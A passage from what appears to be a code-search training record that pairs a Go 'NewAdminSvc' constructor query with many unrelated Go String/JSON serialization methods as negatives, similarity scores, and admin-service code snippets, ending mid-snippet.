\"links\": [ `, *s.id )\n\n\t\tfor i := 0; i < s.lidx; i++ {\n\t\t\tjstr += fmt.Sprintf( \"%s%s\", sep, s.links[i].To_json() )\n\t\t\tsep = \",\"\n\t\t}\n\t\tjstr += \" ]\"\n\t} else {\n\t\tjstr = fmt.Sprintf( `{ \"id\": %q }`, *s.id )\n\t}\n\n\n\tif len( s.hosts ) > 0 {\n\t\tjstr += fmt.Sprintf( `, \"conn_hosts\": [ ` )\n\t\tsep = \"\"\n\t\tfor k := range s.hosts {\n\t\t\tif s.hosts[k] == true {\n\t\t\t\tvmid := \"unknown\"\n\t\t\t\tif s.hvmid[k] != nil {\n\t\t\t\t\tvmid = *s.hvmid[k]\n\t\t\t\t}\n\t\t\t\tjstr += fmt.Sprintf( `%s { \"host\": %q, \"port\": %d, \"vmid\": %q }`, sep, k, s.hport[k], vmid )\n\t\t\t\tsep = \",\"\n\t\t\t}\n\t\t}\n\t\tjstr += \" ]\"\n\t}\n\n\tjstr += \" }\"\n\treturn\n}", "func (m Maps) String() string {\n\tjc, _ := json.Marshal(m)\n\treturn string(jc)\n}", "func (obj *ServerMemoryInfoImpl) String() string {\n\tvar buffer bytes.Buffer\n\tbuffer.WriteString(\"ServerMemoryInfoImpl:{\")\n\tbuffer.WriteString(fmt.Sprintf(\"ProcessMemory: '%+v'\", obj.processMemory))\n\tbuffer.WriteString(fmt.Sprintf(\", SharedMemory: '%+v'\", obj.sharedMemory))\n\tbuffer.WriteString(\"}\")\n\treturn buffer.String()\n}", "func (m MacAddrTableEntries) String() string {\n\tjm, _ := json.Marshal(m)\n\treturn string(jm)\n}", "func String() string {\n\toutput := output{\n\t\tRerun: Rerun,\n\t\tVariables: Variables,\n\t\tItems: Items,\n\t}\n\tvar err error\n\tvar b []byte\n\tif Indent == \"\" {\n\t\tb, err = json.Marshal(output)\n\t} else {\n\t\tb, err = json.MarshalIndent(output, \"\", Indent)\n\t}\n\tif err != nil {\n\t\tmessageErr := Errorf(\"Error in parser. Please report this output to https://github.com/drgrib/alfred/issues: %v\", err)\n\t\tpanic(messageErr)\n\t}\n\ts := string(b)\n\treturn s\n}", "func (receiver envVariable) String() string {\n\treturn string(receiver)\n}", "func (p *Parms) String() string {\n\tout, _ := json.MarshalIndent(p, \"\", \"\\t\")\n\treturn string(out)\n}", "func (env *Environment) String() string {\n\tmarshalled := env.Marshal()\n\treturn marshalled\n}", "func (o *Domainedgesoftwareversiondto) String() string {\n \n \n \n \n \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (o *Apiusageclientquery) String() string {\n \n \n o.Metrics = []string{\"\"} \n o.GroupBy = []string{\"\"} \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (o *Crossplatformpolicycreate) String() string {\n \n \n \n \n \n \n \n \n \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (t Technology) String() string {\n\tjt, _ := json.Marshal(t)\n\treturn string(jt)\n}", "func (o *Shiftstartvariance) String() string {\n o.ApplicableDays = []string{\"\"} \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (pm partitionMap) String() string {\n\tres := bytes.Buffer{}\n\tfor ns, partitions := range pm {\n\t\tres.WriteString(\"-----------------------------------------------------------------------\\n\")\n\t\tres.WriteString(\"Namespace: \" + ns + \"\\n\")\n\t\tres.WriteString(fmt.Sprintf(\"Regimes: %v\\n\", partitions.regimes))\n\t\tres.WriteString(fmt.Sprintf(\"SCMode: %v\\n\", partitions.SCMode))\n\t\treplicaArray := partitions.Replicas\n\t\tfor i, nodeArray := range replicaArray {\n\t\t\tif i == 0 {\n\t\t\t\tres.WriteString(\"\\nMASTER:\")\n\t\t\t} else {\n\t\t\t\tres.WriteString(fmt.Sprintf(\"\\nReplica %d: \", i))\n\t\t\t}\n\t\t\tfor partitionID, node := range nodeArray {\n\t\t\t\tres.WriteString(strconv.Itoa(partitionID) + \"/\")\n\t\t\t\tif node != nil {\n\t\t\t\t\tres.WriteString(node.host.String())\n\t\t\t\t\tres.WriteString(\", \")\n\t\t\t\t} else {\n\t\t\t\t\tres.WriteString(\"nil, \")\n\t\t\t\t}\n\t\t\t}\n\t\t\tres.WriteString(\"\\n\")\n\t\t}\n\t}\n\tres.WriteString(\"\\n\")\n\treturn res.String()\n}", "func (g Groups) String() string {\n\tjg, _ := json.Marshal(g)\n\treturn string(jg)\n}", "func (e ExternalCfp) String() string {\n\tje, _ := json.Marshal(e)\n\treturn string(je)\n}", "func (o *Integrationtype) String() string {\n\tj, _ := json.Marshal(o)\n\tstr, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n\treturn str\n}", "func (r Register) String() string {\n\tJSON, err := json.Marshal(r)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\treturn string(JSON)\n}", "func (o *Metrics) String() string {\n \n \n \n \n \n \n \n \n \n \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (o *Predictor) String() string {\n o.Queues = []Addressableentityref{{}} \n \n \n \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (r SendAll) String() string {\n\tJSON, err := json.Marshal(r)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\treturn string(JSON)\n}", "func (o *Knowledgegroupstatistics) String() string {\n \n \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (s *Siegfried) JSON() string {\n\tversion := config.Version()\n\tstr := fmt.Sprintf(\n\t\t\"{\\\"siegfried\\\":\\\"%d.%d.%d\\\",\\\"scandate\\\":\\\"%v\\\",\\\"signature\\\":\\\"%s\\\",\\\"created\\\":\\\"%v\\\",\\\"identifiers\\\":[\",\n\t\tversion[0], version[1], version[2],\n\t\ttime.Now().Format(time.RFC3339),\n\t\tconfig.SignatureBase(),\n\t\ts.C.Format(time.RFC3339))\n\tfor i, id := range s.ids {\n\t\tif i > 0 {\n\t\t\tstr += \",\"\n\t\t}\n\t\td := id.Describe()\n\t\tstr += fmt.Sprintf(\"{\\\"name\\\":\\\"%s\\\",\\\"details\\\":\\\"%s\\\"}\", d[0], d[1])\n\t}\n\tstr += \"],\"\n\treturn str\n}", "func (s Slots) JSON() string {\n\ttype t struct {\n\t\tAddress string `json:\"slot-owner\"`\n\t\tKey string `json:\"bls-public-key\"`\n\t\tStake string `json:\"actual-stake\"`\n\t}\n\ttype v struct {\n\t\tSlots []t `json:\"slots\"`\n\t}\n\tdata := v{}\n\tfor i := range s {\n\t\tnewData := t{\n\t\t\tcommon2.MustAddressToBech32(s[i].Address),\n\t\t\ts[i].BlsPublicKey.Hex(),\n\t\t\ts[i].Dec.String(),\n\t\t}\n\t\tdata.Slots = append(data.Slots, newData)\n\t}\n\tb, _ := json.Marshal(data)\n\treturn string(b)\n}", "func (runtime *Runtime) String() (s string) {\n\ts = fmt.Sprintf(\"NRandomFeature: %d\\n\"+\n\t\t\" SplitMethod : %s\\n\"+\n\t\t\" Tree :\\n%v\", runtime.NRandomFeature,\n\t\truntime.SplitMethod,\n\t\truntime.Tree.String())\n\treturn s\n}", "func (o *Timezonemappingpreview) String() string {\n \n o.ContactsPerTimeZone = map[string]int{\"\": 0} \n o.ContactsMappedUsingZipCode = map[string]int{\"\": 0} \n \n \n \n \n \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (varInits *VariableInits) String() string {\n\treturn fmt.Sprintf(\"varinits: %v\\n\", *varInits)\n}", "func (o *Webdeployment) String() string {\n \n \n \n o.AllowedDomains = []string{\"\"} \n \n \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (mVar Machine) MarshalJSON() ([]byte, error) {\n\tobjectMap := make(map[string]interface{})\n\tif mVar.MachinePropertiesModel != nil {\n\t\tobjectMap[\"properties\"] = mVar.MachinePropertiesModel\n\t}\n\tif mVar.Identity != nil {\n\t\tobjectMap[\"identity\"] = mVar.Identity\n\t}\n\tif mVar.Tags != nil {\n\t\tobjectMap[\"tags\"] = mVar.Tags\n\t}\n\tif mVar.Location != nil {\n\t\tobjectMap[\"location\"] = mVar.Location\n\t}\n\treturn json.Marshal(objectMap)\n}", "func (r ReceiveAll) String() string {\n\tJSON, err := json.Marshal(r)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\treturn string(JSON)\n}", "func (o *Digitalcondition) String() string {\n\tj, _ := json.Marshal(o)\n\tstr, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n\treturn str\n}", "func (o *Addshifttraderequest) String() string {\n \n \n \n \n o.AcceptableIntervals = []string{\"\"} \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (s CreateEnvironmentOutput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (o *Patchintegrationactionfields) String() string {\n \n o.RequestMappings = []Requestmapping{{}} \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (s GetEnvironmentOutput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (d DataMaps) String() string {\n\tjd, _ := json.Marshal(d)\n\treturn string(jd)\n}", "func (m *Metrics) String() string {\n\tb, _ := json.Marshal(m)\n\treturn string(b)\n}", "func (m TopSystem) MarshalJSON() ([]byte, error) {\n\t_parts := make([][]byte, 0, 2)\n\n\taO0, err := swag.WriteJSON(m.InventoryBase)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\t_parts = append(_parts, aO0)\n\n\tvar dataAO1 struct {\n\t\tComputeBlades []*ComputeBladeRef `json:\"ComputeBlades\"`\n\n\t\tComputeRackUnits []*ComputeRackUnitRef `json:\"ComputeRackUnits\"`\n\n\t\tIPV4Address string `json:\"Ipv4Address,omitempty\"`\n\n\t\tIPV6Address string `json:\"Ipv6Address,omitempty\"`\n\n\t\tManagementController *ManagementControllerRef `json:\"ManagementController,omitempty\"`\n\n\t\tMode string `json:\"Mode,omitempty\"`\n\n\t\tName string `json:\"Name,omitempty\"`\n\n\t\tNetworkElements []*NetworkElementRef `json:\"NetworkElements\"`\n\n\t\tRegisteredDevice *AssetDeviceRegistrationRef `json:\"RegisteredDevice,omitempty\"`\n\n\t\tTimeZone string `json:\"TimeZone,omitempty\"`\n\t}\n\n\tdataAO1.ComputeBlades = m.ComputeBlades\n\n\tdataAO1.ComputeRackUnits = m.ComputeRackUnits\n\n\tdataAO1.IPV4Address = m.IPV4Address\n\n\tdataAO1.IPV6Address = m.IPV6Address\n\n\tdataAO1.ManagementController = m.ManagementController\n\n\tdataAO1.Mode = m.Mode\n\n\tdataAO1.Name = m.Name\n\n\tdataAO1.NetworkElements = m.NetworkElements\n\n\tdataAO1.RegisteredDevice = m.RegisteredDevice\n\n\tdataAO1.TimeZone = m.TimeZone\n\n\tjsonDataAO1, errAO1 := swag.WriteJSON(dataAO1)\n\tif errAO1 != nil {\n\t\treturn nil, errAO1\n\t}\n\t_parts = append(_parts, jsonDataAO1)\n\n\treturn swag.ConcatJSON(_parts...), nil\n}", "func String() string {\n\treturn fmt.Sprintf(\n\t\t\"AppVersion = %s\\n\"+\n\t\t\t\"VCSRef = %s\\n\"+\n\t\t\t\"BuildVersion = %s\\n\"+\n\t\t\t\"BuildDate = %s\",\n\t\tAppVersion, VCSRef, BuildVersion, Date,\n\t)\n}", "func (o *Observationvalue) String() string {\n \n \n \n o.RequestedRoutingSkillIds = []string{\"\"} \n \n \n \n \n \n \n \n \n \n \n \n \n o.RequestedRoutings = []string{\"\"} \n \n o.ScoredAgents = []Analyticsscoredagent{{}} \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func outPut() {\n\ts, _ := json.Marshal(allMap)\n\tfmt.Println(string(s))\n\ts, _ = json.Marshal(errMap)\n\tfmt.Println(string(s))\n}", "func (v Global) String() string {\n\trepr, err := DefaultEncoder().Encode(&v)\n\tif err != nil {\n\t\treturn NilRef\n\t}\n\treturn repr\n}", "func (m Mall) String() string {\n\ts, err := json.Marshal(m)\n\tif err != nil {\n\t\treturn err.Error()\n\t}\n\treturn string(s)\n}", "func (v Var) String() string {\n\t//return \"${\" + string(v) + \"}\"\n\treturn string(v)\n}", "func (p *PhysicalDriveStat) String() string {\n\tdata, err := json.Marshal(p)\n\tif err != nil {\n\t\treturn err.Error()\n\t}\n\treturn string(data)\n}", "func (o *Botversionsummary) String() string {\n \n \n \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (t Targets) String() string {\n\tjt, _ := json.Marshal(t)\n\treturn string(jt)\n}", "func (o *Meteredevaluationassignment) String() string {\n \n o.Evaluators = []User{{}} \n \n \n \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (this *Variable) String() string {\n\ttyp := this.GetType()\n\tif types.IsList(typ) {\n\t\ttypes.ListToSingle(typ)\n\t}\n\tswitch typ {\n\tcase types.SINGLE_DOUBLE:\n\t\treturn \"$double\"\n\tcase types.SINGLE_INT:\n\t\treturn \"$int\"\n\tcase types.SINGLE_UINT:\n\t\treturn \"$uint\"\n\tcase types.SINGLE_BOOL:\n\t\treturn \"$bool\"\n\tcase types.SINGLE_STRING:\n\t\treturn \"$string\"\n\tcase types.SINGLE_BYTES:\n\t\treturn \"$[]byte\"\n\t}\n\tpanic(fmt.Errorf(\"unknown type %s\", this.GetType()))\n}", "func (o *Edgelogsjobfile) String() string {\n \n \n \n \n \n \n \n \n \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (mio *MsgInOut) String() string {\n\tjs, _ := json.Marshal(mio.msgOutStruct)\n\treturn string(js)\n}", "func (s MonitoringJsonDatasetFormat) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (fp *BatchGetLimitPoolsRequest_FieldTerminalPath) JSONString() string {\n\treturn strcase.ToLowerCamel(fp.String())\n}", "func hostMetrics(host *Host, time int32) string {\n \n cpu := random(BigDogMinCPU,BigDogMaxCPU)\n disk := random(BigDogMinDisk,BigDogMaxDisk)\n mem := random(BigDogMinMem,BigDogMaxMem)\n json := fmt.Sprintf(`{\"series\" : \n [\n {\n \"metric\":\"system.cpu.stolen\",\n \"points\":[[%d,0]],\n \"type\":\"gauge\",\n \"host\":\"%s\",\n \"tags\":[\"%s:%s\",\"%s:%s\"]\n },\n {\n \"metric\":\"system.cpu.user\",\n \"points\":[[%d,%d]],\n \"type\":\"gauge\",\n \"host\":\"%s\",\n \"tags\":[\"%s:%s\",\"%s:%s\"]\n },\n {\n \"metric\":\"system.disk.used\",\n \"points\":[[%d,%d]],\n \"type\":\"gauge\",\n \"host\":\"%s\",\n \"tags\":[\"%s:%s\",\"%s:%s\"]\n },\n {\n \"metric\":\"system.mem.used\",\n \"points\":[[%d,%d]],\n \"type\":\"gauge\",\n \"host\":\"%s\",\n \"tags\":[\"%s:%s\",\"%s:%s\"]\n }\n ]\n }`,time,host.name,host.tags[0].name,host.tags[0].value,host.tags[1].name,host.tags[1].value,time,cpu,host.name,host.tags[0].name,host.tags[0].value,host.tags[1].name,host.tags[1].value,time,disk,host.name,host.tags[0].name,host.tags[0].value,host.tags[1].name,host.tags[1].value,time,mem,host.name,host.tags[0].name,host.tags[0].value,host.tags[1].name,host.tags[1].value)\n fmt.Println(json)\n\n return json\n}", "func (fp *WatchLimitPoolsRequest_FieldTerminalPath) JSONString() string {\n\treturn strcase.ToLowerCamel(fp.String())\n}", "func (o *Agentownedmappingpreview) String() string {\n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (fp *GetLimitPoolRequest_FieldTerminalPath) JSONString() string {\n\treturn strcase.ToLowerCamel(fp.String())\n}", "func (o *Interactionstatsalert) String() string {\n \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (o *Integrationstatusinfo) String() string {\n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (fp *WatchLimitPoolsResponse_FieldTerminalPath) JSONString() string {\n\treturn strcase.ToLowerCamel(fp.String())\n}", "func (o *Commonruleconditions) String() string {\n o.Clauses = []Commonruleconditions{{}} \n o.Predicates = []Commonrulepredicate{{}} \n \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (el EnvironmentList) JSON() ([]byte, error) {\n\treturn json.Marshal(el.Environments)\n}", "func (i *ServerInfo) String() string { return i.registry.String() }", "func (s ListGlobalTablesOutput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s RuntimePlatform) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (env *Environment) Dump() string {\n\tvar b bytes.Buffer\n\tb.WriteString(env.String())\n\tb.WriteString(\" {\\n\")\n\tfor k, v := range env.dict {\n\t\tb.WriteString(fmt.Sprintf(\" %s = %v\\n\", k, v))\n\t}\n\tb.WriteString(\"}\\n\")\n\treturn b.String()\n}", "func (o *Routingstatus) String() string {\n \n \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (o *Reschedulingoptionsrunresponse) String() string {\n \n \n \n o.ManagementUnits = []Reschedulingmanagementunitresponse{{}} \n \n o.ActivityCodeIds = []string{\"\"} \n \n \n \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (fp *BatchGetLimitPoolsResponse_FieldTerminalPath) JSONString() string {\n\treturn strcase.ToLowerCamel(fp.String())\n}", "func (e *Executor) String() string {\n\treturn fmt.Sprintf(`{\n Build: %s,\n Distribution: %s,\n Host: %s,\n ID: %d,\n Repo: %v,\n Runtime: %s,\n Pipeline: %v,\n}`,\n\t\tstrings.ReplaceAll(e.Build.String(), \" \", \" \"),\n\t\te.GetDistribution(),\n\t\te.GetHost(),\n\t\te.GetID(),\n\t\tstrings.ReplaceAll(e.Repo.String(), \" \", \" \"),\n\t\te.GetRuntime(),\n\t\te.GetPipeline(),\n\t)\n}", "func (d ExecDetails) String() string {\n\tparts := make([]string, 0, 6)\n\tif d.ProcessTime > 0 {\n\t\tparts = append(parts, fmt.Sprintf(\"process_time:%v\", d.ProcessTime))\n\t}\n\tif d.WaitTime > 0 {\n\t\tparts = append(parts, fmt.Sprintf(\"wait_time:%v\", d.WaitTime))\n\t}\n\tif d.BackoffTime > 0 {\n\t\tparts = append(parts, fmt.Sprintf(\"backoff_time:%v\", d.BackoffTime))\n\t}\n\tif d.RequestCount > 0 {\n\t\tparts = append(parts, fmt.Sprintf(\"request_count:%d\", d.RequestCount))\n\t}\n\tif d.TotalKeys > 0 {\n\t\tparts = append(parts, fmt.Sprintf(\"total_keys:%d\", d.TotalKeys))\n\t}\n\tif d.ProcessedKeys > 0 {\n\t\tparts = append(parts, fmt.Sprintf(\"processed_keys:%d\", d.ProcessedKeys))\n\t}\n\treturn strings.Join(parts, \" \")\n}", "func (s DescribeExportOutput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (o *Screenrecordingmetadatarequest) String() string {\n \n \n o.MetaData = []Screenrecordingmetadata{{}} \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (o *Wfmagent) String() string {\n\tj, _ := json.Marshal(o)\n\tstr, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n\treturn str\n}", "func (s GetExportOutput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (fp *WatchLimitPoolRequest_FieldTerminalPath) JSONString() string {\n\treturn strcase.ToLowerCamel(fp.String())\n}", "func (fp *AlertingConditionSpecTimeSeriesCombineThreshold_FieldTerminalPath) JSONString() string {\n\treturn strcase.ToLowerCamel(fp.String())\n}", "func (z Zamowienia) String() string {\n\tjz, _ := json.Marshal(z)\n\treturn string(jz)\n}", "func (o *Directrouting) String() string {\n\tj, _ := json.Marshal(o)\n\tstr, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n\treturn str\n}", "func (t Things) String() string {\n\tjt, _ := json.Marshal(t)\n\treturn string(jt)\n}", "func (p Providers) String() string {\n\tjp, _ := json.Marshal(p)\n\treturn string(jp)\n}", "func (t Tasks) String() string {\n\tjt, _ := json.Marshal(t)\n\treturn string(jt)\n}", "func (s CreateExportOutput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (fp *UpdateLimitPoolRequest_FieldTerminalPath) JSONString() string {\n\treturn strcase.ToLowerCamel(fp.String())\n}", "func (z Zamowienium) String() string {\n\tjz, _ := json.Marshal(z)\n\treturn string(jz)\n}", "func (o *Adjustablelivespeakerdetection) String() string {\n \n \n \n \n \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (fpm *AlertingConditionSpecTimeSeriesCombineThreshold_FieldPathMap) JSONString() string {\n\treturn strcase.ToLowerCamel(fpm.selector.String()) + \".\" + fpm.key\n}", "func (o *Wfmbushorttermforecastimportcompletetopicbuforecastmodification) String() string {\n\tj, _ := json.Marshal(o)\n\tstr, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n\treturn str\n}" ]
[ "0.64582294", "0.61513627", "0.59408474", "0.58889115", "0.5862349", "0.5803273", "0.5616322", "0.5597943", "0.558776", "0.55564445", "0.55371124", "0.5525787", "0.55241513", "0.55069613", "0.5500162", "0.547469", "0.545286", "0.54482406", "0.542477", "0.54244554", "0.53820133", "0.5378335", "0.5364681", "0.5357897", "0.5357395", "0.5355628", "0.53551006", "0.53520954", "0.533955", "0.53351086", "0.53339237", "0.5330895", "0.5315325", "0.53061205", "0.53051955", "0.5288138", "0.52874506", "0.5280048", "0.527676", "0.5272498", "0.5272385", "0.5265308", "0.52566653", "0.52562517", "0.52557045", "0.5252522", "0.5252344", "0.5237295", "0.5230424", "0.52277255", "0.52261686", "0.5223708", "0.52234095", "0.521721", "0.5208591", "0.5208223", "0.52028227", "0.5195241", "0.518841", "0.5183594", "0.51815706", "0.5179304", "0.51598966", "0.5157386", "0.5156424", "0.5152692", "0.5148924", "0.5147031", "0.5143071", "0.51420975", "0.5136349", "0.5134709", "0.5132049", "0.5125503", "0.51244044", "0.5114961", "0.51077694", "0.51060516", "0.5105275", "0.5104025", "0.5103995", "0.51036936", "0.51029754", "0.5095481", "0.5093627", "0.5085008", "0.5084048", "0.50790995", "0.50778145", "0.5076829", "0.50744045", "0.50718504", "0.50678474", "0.50648624", "0.50641656", "0.5064004", "0.5063485", "0.5062104", "0.50603694", "0.50572157" ]
0.6952698
0
NewAdminSvc exposed the ORM to the admin functions in the module
func NewAdminSvc(db *orm.ORM, rdb *redis.Client) AdminService { return &ORM{db, rdb} }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func New(db *gorm.DB, prefix, cookiesecret string) *Admin {\n\tadminpath := filepath.Join(prefix, \"/admin\")\n\ta := Admin{\n\t\tdb: db,\n\t\tprefix: prefix,\n\t\tadminpath: adminpath,\n\t\tauth: auth{\n\t\t\tdb: db,\n\t\t\tpaths: pathConfig{\n\t\t\t\tadmin: adminpath,\n\t\t\t\tlogin: filepath.Join(prefix, \"/login\"),\n\t\t\t\tlogout: filepath.Join(prefix, \"/logout\"),\n\t\t\t},\n\t\t\tsession: sessionConfig{\n\t\t\t\tkey: \"userid\",\n\t\t\t\tname: \"admsession\",\n\t\t\t\tstore: cookie.NewStore([]byte(cookiesecret)),\n\t\t\t},\n\t\t},\n\t}\n\ta.adm = admin.New(&admin.AdminConfig{\n\t\tSiteName: \"My Admin Interface\",\n\t\tDB: db,\n\t\tAuth: a.auth,\n\t\tAssetFS: bindatafs.AssetFS.NameSpace(\"admin\"),\n\t})\n\taddUser(a.adm)\n\tresources.AddProduct(a.adm)\n\treturn &a\n}", "func NewAdminService(db *gorm.DB, repo *repository.Repositorysrv) *AdminService {\n\tdb.AutoMigrate(models.User{})\n\treturn &AdminService{\n\t\tDB: db,\n\t\tRepository: repo,\n\t}\n}", "func (m *GraphBaseServiceClient) Admin()(*i7c9d1b36ac198368c1d8bed014b43e2a518b170ee45bf02c8bbe64544a50539a.AdminRequestBuilder) {\n return i7c9d1b36ac198368c1d8bed014b43e2a518b170ee45bf02c8bbe64544a50539a.NewAdminRequestBuilderInternal(m.pathParameters, m.requestAdapter);\n}", "func (m *GraphBaseServiceClient) Admin()(*i7c9d1b36ac198368c1d8bed014b43e2a518b170ee45bf02c8bbe64544a50539a.AdminRequestBuilder) {\n return i7c9d1b36ac198368c1d8bed014b43e2a518b170ee45bf02c8bbe64544a50539a.NewAdminRequestBuilderInternal(m.pathParameters, m.requestAdapter);\n}", "func (*AdminInfoService) NewAdmin(id int, pwd string, name string) *entities.AdminInfo {\n\tadmin := &entities.AdminInfo{\n\t\tAdminId: id,\n\t\tAdminPwd: pwd,\n\t\tAdminName: name,\n\t}\n\treturn admin\n}", "func (_Bindings *BindingsFilterer) FilterNewAdmin(opts *bind.FilterOpts) (*BindingsNewAdminIterator, error) {\n\n\tlogs, sub, err := _Bindings.contract.FilterLogs(opts, \"NewAdmin\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &BindingsNewAdminIterator{contract: _Bindings.contract, event: \"NewAdmin\", logs: logs, sub: sub}, nil\n}", "func Init(c *Config) {\n\tconf := &controller.Config{\n\t\tSvc: service.New(&service.Config{DB: c.DB}),\n\t}\n\tctl := controller.New(conf)\n\tengine := c.Engine\n\tr1 := engine.Group(\"/admin\")\n\t{\n\t\tr1.POST(\"/login\", ctl.AdminLogin)\n\t\tr1.GET(\"/info\", nil)\n\t\tr1.POST(\"/logout\", ctl.AdminLogout)\n\t\tr1.GET(\"/list\", nil)\n\t\tr1.POST(\"/register\", ctl.AdminRegister)\n\t\tr1.POST(\"/update/:id\", nil)\n\t\tr1.POST(\"/delete/:id\", nil)\n\n\t\tr1.GET(\"/role/:id\", ctl.AdminRole)\n\t\tr1.POST(\"/role/update\", nil)\n\t}\n}", "func (ct *customer) CreateAdmin(c echo.Context) error {\n\tpanic(\"implement me later on\")\n}", "func AdminCreate(w http.ResponseWriter, data interface{}) {\n\trender(tpAdminCreate, w, data)\n}", "func AdminCreate(w http.ResponseWriter, data interface{}) {\n\trender(tpAdminCreate, w, data)\n}", "func (v AdminsResource) New(c buffalo.Context) error {\n\treturn c.Render(200, r.JSON(&models.Admin{}))\n}", "func NewService(config Config) (*common.HTTPHandler, error) {\n\tnewServer := rpc.NewServer()\n\tcodec := json.NewCodec()\n\tnewServer.RegisterCodec(codec, \"application/json\")\n\tnewServer.RegisterCodec(codec, \"application/json;charset=UTF-8\")\n\tif err := newServer.RegisterService(&Admin{\n\t\tConfig: config,\n\t\tprofiler: profiler.New(config.ProfileDir),\n\t}, \"admin\"); err != nil {\n\t\treturn nil, err\n\t}\n\treturn &common.HTTPHandler{Handler: newServer}, nil\n}", "func CreatePgAdminHandler(w http.ResponseWriter, r *http.Request) {\n\t// swagger:operation POST /pgadmin pgadminservice pgadmin-post\n\t/*```\n\t Create a pgAdmin instance\n\t*/\n\t// ---\n\t// produces:\n\t// - application/json\n\t// parameters:\n\t// - name: \"Create PgAdmin Request\"\n\t// in: \"body\"\n\t// schema:\n\t// \"$ref\": \"#/definitions/CreatePgAdminRequest\"\n\t// responses:\n\t// '200':\n\t// description: Output\n\t// schema:\n\t// \"$ref\": \"#/definitions/CreatePgAdminResponse\"\n\tvar ns string\n\tlog.Debug(\"pgadminservice.CreatePgAdminHandler called\")\n\tusername, err := apiserver.Authn(apiserver.CREATE_PGADMIN_PERM, w, r)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tw.Header().Set(\"WWW-Authenticate\", `Basic realm=\"Restricted\"`)\n\tw.Header().Set(\"Content-Type\", 